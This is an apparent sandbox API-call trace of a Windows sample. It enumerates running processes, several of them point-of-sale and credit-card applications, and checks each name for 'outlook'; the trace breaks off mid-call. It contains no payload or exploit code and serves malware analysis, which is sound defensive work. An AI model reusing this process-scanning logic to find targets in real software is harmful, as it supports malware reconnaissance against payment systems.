[0098.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.716] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35787f8 [0098.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x35787f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0098.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0098.716] StrStrIA (lpFirst="afr38.exe", lpSrch="outlook") returned 0x0 [0098.716] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0098.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.717] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35786a8 [0098.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x35786a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0098.717] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0098.717] StrStrIA (lpFirst="aldelo.exe", lpSrch="outlook") returned 0x0 [0098.717] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0098.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0098.719] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3578840 [0098.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3578840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0098.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0098.719] StrStrIA (lpFirst="ccv_server.exe", lpSrch="outlook") returned 0x0 [0098.719] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0098.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0098.720] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357a218 [0098.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357a218, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0098.720] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0098.720] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="outlook") returned 0x0 [0098.721] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0098.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0098.766] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357a338 [0098.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357a338, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0098.766] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0098.766] StrStrIA (lpFirst="creditservice.exe", lpSrch="outlook") returned 0x0 [0098.766] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0098.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.767] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578780 [0098.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3578780, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0098.768] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0098.768] StrStrIA (lpFirst="edcsvr.exe", lpSrch="outlook") returned 0x0 [0098.768] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0098.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.769] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578768 [0098.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3578768, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0098.769] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0098.769] StrStrIA (lpFirst="fpos.exe", lpSrch="outlook") returned 0x0 [0098.769] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0098.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.771] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35788d0 [0098.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35788d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0098.771] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0098.771] StrStrIA (lpFirst="isspos.exe", lpSrch="outlook") returned 0x0 [0098.771] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0098.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.772] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a358 [0098.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357a358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0098.772] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0098.772] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="outlook") returned 0x0 [0098.772] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0098.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.773] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578858 [0098.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3578858, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0098.774] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0098.774] StrStrIA (lpFirst="omnipos.exe", lpSrch="outlook") returned 0x0 [0098.774] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0098.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.775] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35786d8 [0098.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x35786d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0098.775] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0098.775] StrStrIA (lpFirst="spcwin.exe", lpSrch="outlook") returned 0x0 [0098.775] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0098.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.776] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357a3d8 [0098.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357a3d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0098.776] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0098.777] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="outlook") returned 0x0 [0098.777] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0098.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.778] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578960 [0098.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3578960, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0098.778] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0098.778] StrStrIA (lpFirst="utg2.exe", lpSrch="outlook") returned 0x0 [0098.778] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0098.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.779] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35786c0 [0098.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x35786c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0098.780] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0098.780] StrStrIA (lpFirst="saying.exe", lpSrch="outlook") returned 0x0 [0098.780] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0098.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.781] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578810 [0098.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3578810, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0098.781] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0098.781] StrStrIA (lpFirst="ripe.exe", lpSrch="outlook") returned 0x0 [0098.781] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0098.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.782] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35786f0 [0098.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35786f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0098.782] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0098.783] StrStrIA (lpFirst="acoustic.exe", lpSrch="outlook") returned 0x0 [0098.783] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0098.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.802] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578870 [0098.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3578870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0098.803] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0098.803] StrStrIA (lpFirst="mail.exe", lpSrch="outlook") returned 0x0 [0098.803] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0098.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.804] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578798 [0098.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3578798, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0098.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0098.804] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="outlook") returned 0x0 [0098.804] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.805] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578888 [0098.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578888, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.805] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.805] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.806] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0098.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.807] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35787c8 [0098.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x35787c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.807] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0098.807] StrStrIA (lpFirst="dllhost.exe", lpSrch="outlook") returned 0x0 [0098.807] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.808] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35788e8 [0098.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35788e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0098.808] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0098.808] StrStrIA (lpFirst="taskhostw.exe", lpSrch="outlook") returned 0x0 [0098.808] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0098.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.810] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578708 [0098.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3578708, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0098.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0098.810] StrStrIA (lpFirst="UsoClient.exe", lpSrch="outlook") returned 0x0 [0098.810] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.811] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35788a0 [0098.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35788a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0098.811] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0098.811] StrStrIA (lpFirst="taskhostw.exe", lpSrch="outlook") returned 0x0 [0098.811] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0098.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, 